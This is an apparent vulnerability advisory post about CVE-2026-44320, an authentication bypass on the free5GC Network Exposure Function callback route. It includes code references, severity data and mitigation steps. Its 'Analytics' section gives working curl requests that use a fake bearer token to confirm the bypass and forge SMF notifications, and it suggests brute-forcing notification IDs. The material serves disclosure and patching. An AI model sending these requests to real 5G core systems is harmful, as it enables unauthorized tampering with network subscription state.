Listen to this Post
CVE-2026-44320 allows an unauthenticated attacker to bypass the OAuth2/bearer‑token authorization boundary on the Network Exposure Function (NEF) `/nnef‑callback` route group. The free5GC NEF prior to version 4.2.2 mounts this route group without any inbound authentication middleware, even though the component declares that it receives OAuth2 settings from the NRF. A forged or arbitrary bearer token – for example, `Authorization: Bearer not-a-real-token` – is sufficient to reach the Session Management Function (SMF) callback handler. Instead of rejecting the request at the authentication boundary, the NEF parses the request body and dispatches it directly into its business logic.
The vulnerability has been validated against the official Docker compose lab using image free5gc/nef:v4.2.1. In the codebase, the callback route group is mounted without auth middleware in NFs/nef/internal/sbi/server.go:64. The endpoint `/notification/smf` is exposed in NFs/nef/internal/sbi/api_callback.go:13, and the API layer reads raw request bytes and deserialises them before any authorisation check (NFs/nef/internal/sbi/api_callback.go:23). The processor then looks up subscription state by the `NotifId` (NFs/nef/internal/sbi/processor/callback.go:13).
Because the NEF does not authenticate the producer NF identity, an attacker who can guess or obtain a valid `NotifId` can submit forged callbacks that act on real subscription state. Moreover, the route group remains reachable even when the runtime `ServiceList` does not declare it (the configuration only lists `nnef-pfdmanagement` and nnef-oam).
This is a classic authentication bypass (CWE‑306) combined with missing authorisation (CWE‑862). The CVSS score is 7.3 (High), with an EPSS score of 0.04 % (11th percentile). No CISA KEV entry exists, but the attack path is straightforward and automatable.
DailyCVE Form
Platform: free5GC NEF
Version: < 4.2.2
Vulnerability: Auth bypass
Severity: High (7.3)
Date: 2026‑05‑27
Prediction: 2026‑06‑10 (expected)
Analytics – What Undercode Say
Confirm the vulnerable route group is accessible
curl -i -X POST http://<target>:8000/nnef-callback/v1/notification/smf \
-H 'Authorization: Bearer not-a-real-token' \
-H 'Content-Type: application/json' \
-d '{"notifId":"any-random-id","eventNotifs":[]}'
If the response is 404 (Subscription not found) rather than 401/403,
the endpoint is processing the request – bypass is successful.
Enumerate existing NotifId values (if any) through other NEF APIs or observe response differences to brute‑force valid IDs.
Exploit
Example: replace "valid-notif-id" with a real subscription ID
curl -X POST http://<target>:8000/nnef-callback/v1/notification/smf \
-H 'Authorization: Bearer fake-token' \
-H 'Content-Type: application/json' \
-d '{"notifId":"valid-notif-id","eventNotifs":[{"eventType":"SESSION_UPDATE","eventData":{"foo":"bar"}}]}'
Protection
- Upgrade to free5GC 4.2.2 or later, which adds OAuth2 bearer‑token authentication middleware to the `/nnef‑callback` route group.
- If immediate upgrade is not possible, disable or remove the `nnef-callback` route group from the NEF configuration.
- Validate producer NF identity on all inbound callbacks and restrict network access to the NEF SBI port.
Impact
- Auth bypass (CWE‑306) and missing authorization (CWE‑862) on the NEF’s SBI interface.
- An attacker can forge notifications to alter subscription states, potentially affecting traffic‑steering policies, PFD updates, and other 5G core network functions.
- The route group remains reachable even when not declared in the runtime service list, making the attack surface larger than expected.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

